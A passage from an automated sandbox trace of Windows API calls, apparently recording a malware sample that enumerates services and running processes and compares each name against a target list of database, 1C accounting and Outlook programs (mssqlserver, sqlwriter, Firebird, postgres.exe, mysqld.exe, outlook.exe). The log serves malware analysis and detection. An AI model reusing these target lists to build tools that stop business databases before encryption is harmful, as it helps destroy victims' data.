lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0048.048] GetLastError () returned 0xea [0048.048] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12c6) returned 0x3800fb0 [0048.049] EnumServicesStatusExW (in: hSCManager=0x37208a8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3800fb0, cbBufSize=0x12c6, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3800fb0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0048.049] CloseServiceHandle (hSCObject=0x37208a8) returned 1 [0048.049] lstrlenW (lpString="Appinfo") returned 7 [0048.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0048.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0048.049] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0048.049] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0048.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0048.049] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0048.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0048.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0048.050] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0048.050] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0048.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0048.050] lstrlenW (lpString="AudioSrv") returned 8 [0048.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0048.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0048.050] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0048.050] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0048.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0048.050] lstrlenW (lpString="BFE") returned 3 [0048.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0048.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0048.050] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0048.050] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0048.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0048.050] lstrlenW (lpString="CryptSvc") returned 8 [0048.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0048.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0048.050] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0048.050] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0048.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0048.050] lstrlenW (lpString="CscService") returned 10 [0048.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0048.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0048.050] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0048.050] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0048.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0048.050] lstrlenW (lpString="DcomLaunch") returned 10 [0048.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0048.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0048.050] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0048.050] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0048.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0048.050] lstrlenW (lpString="Dhcp") returned 4 [0048.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0048.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0048.051] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0048.051] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0048.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0048.051] lstrlenW (lpString="Dnscache") returned 8 [0048.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0048.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0048.051] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0048.051] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0048.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0048.051] lstrlenW (lpString="DPS") returned 3 [0048.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0048.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0048.051] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0048.051] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0048.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0048.051] lstrlenW (lpString="eventlog") returned 8 [0048.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0048.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0048.051] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0048.051] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0048.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0048.051] lstrlenW (lpString="EventSystem") returned 11 [0048.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0048.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0048.051] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0048.051] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0048.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0048.051] lstrlenW (lpString="gpsvc") returned 5 [0048.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0048.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0048.051] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0048.051] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0048.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0048.052] lstrlenW (lpString="iphlpsvc") returned 8 [0048.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0048.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0048.052] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0048.052] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0048.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0048.052] lstrlenW (lpString="LanmanServer") returned 12 [0048.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0048.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0048.052] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0048.052] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0048.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0048.052] lstrlenW (lpString="LanmanWorkstation") returned 17 [0048.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0048.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0048.052] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0048.052] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0048.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0048.052] lstrlenW (lpString="lmhosts") returned 7 [0048.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0048.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0048.052] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0048.052] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0048.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0048.052] lstrlenW (lpString="MMCSS") returned 5 [0048.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0048.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0048.052] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0048.052] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0048.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0048.052] lstrlenW (lpString="MpsSvc") returned 6 [0048.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0048.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0048.052] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0048.052] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0048.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0048.053] lstrlenW (lpString="Netman") returned 6 [0048.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0048.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0048.053] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0048.053] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0048.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0048.053] lstrlenW (lpString="netprofm") returned 8 [0048.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0048.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0048.053] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0048.053] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0048.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0048.053] lstrlenW (lpString="NlaSvc") returned 6 [0048.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0048.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0048.053] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0048.053] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0048.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0048.053] lstrlenW (lpString="nsi") returned 3 [0048.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0048.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0048.053] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0048.053] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0048.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0048.053] lstrlenW (lpString="PcaSvc") returned 6 [0048.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0048.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0048.053] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0048.053] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0048.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0048.053] lstrlenW (lpString="PlugPlay") returned 8 [0048.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0048.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0048.053] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0048.053] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0048.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0048.054] lstrlenW (lpString="Power") returned 5 [0048.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0048.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0048.054] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0048.054] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0048.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0048.054] lstrlenW (lpString="ProfSvc") returned 7 [0048.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0048.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0048.054] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0048.054] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0048.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0048.054] lstrlenW (lpString="RpcEptMapper") returned 12 [0048.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0048.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0048.054] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0048.054] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0048.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0048.054] lstrlenW (lpString="RpcSs") returned 5 [0048.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0048.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0048.054] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0048.054] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0048.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0048.054] lstrlenW (lpString="SamSs") returned 5 [0048.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0048.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0048.054] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0048.054] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0048.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0048.054] lstrlenW (lpString="Schedule") returned 8 [0048.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0048.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0048.054] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0048.054] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0048.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0048.055] lstrlenW (lpString="SENS") returned 4 [0048.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0048.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0048.055] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0048.055] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0048.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0048.055] lstrlenW (lpString="ShellHWDetection") returned 16 [0048.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0048.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0048.055] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0048.055] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0048.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0048.055] lstrlenW (lpString="Spooler") returned 7 [0048.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0048.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0048.055] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0048.055] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0048.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0048.055] lstrlenW (lpString="swprv") returned 5 [0048.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0048.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0048.055] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0048.055] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0048.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0048.055] lstrlenW (lpString="SysMain") returned 7 [0048.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0048.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0048.055] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0048.055] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0048.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0048.055] lstrlenW (lpString="Themes") returned 6 [0048.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0048.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0048.056] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0048.056] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0048.056] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0048.056] lstrlenW (lpString="TrkWks") returned 6 [0048.056] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0048.056] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0048.056] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0048.056] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0048.056] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0048.056] lstrlenW (lpString="UxSms") returned 5 [0048.056] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0048.056] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0048.056] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0048.056] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0048.056] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0048.056] lstrlenW (lpString="VSS") returned 3 [0048.056] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0048.056] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0048.056] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0048.056] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0048.056] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0048.056] lstrlenW (lpString="WdiServiceHost") returned 14 [0048.056] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0048.056] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0048.056] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0048.056] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0048.056] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0048.056] lstrlenW (lpString="WdiSystemHost") returned 13 [0048.056] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0048.056] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0048.056] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0048.056] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0048.056] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0048.056] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0048.056] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0048.056] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0048.057] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0048.057] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0048.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0048.057] lstrlenW (lpString="Winmgmt") returned 7 [0048.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0048.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0048.057] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0048.057] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0048.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0048.057] lstrlenW (lpString="WPDBusEnum") returned 10 [0048.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0048.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0048.057] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0048.057] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0048.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0048.057] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3800fb0 | out: hHeap=0x5f0000) returned 1 [0048.057] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x16c [0048.059] Process32FirstW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0048.060] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0048.060] lstrlenW (lpString="System") returned 6 [0048.061] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0048.061] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0048.061] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0048.061] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0048.061] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0048.061] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0048.061] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0048.061] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0048.061] lstrlenW (lpString="smss.exe") returned 8 [0048.061] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0048.061] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0048.061] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0048.061] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0048.061] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0048.061] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0048.062] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0048.062] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0048.062] lstrlenW (lpString="csrss.exe") returned 9 [0048.062] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0048.062] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0048.063] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0048.063] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0048.063] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0048.063] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0048.063] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0048.063] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0048.063] lstrlenW (lpString="wininit.exe") returned 11 [0048.063] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0048.063] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0048.063] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0048.063] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0048.064] lstrlenW (lpString="csrss.exe") returned 9 [0048.064] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0048.065] lstrlenW (lpString="winlogon.exe") returned 12 [0048.065] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: 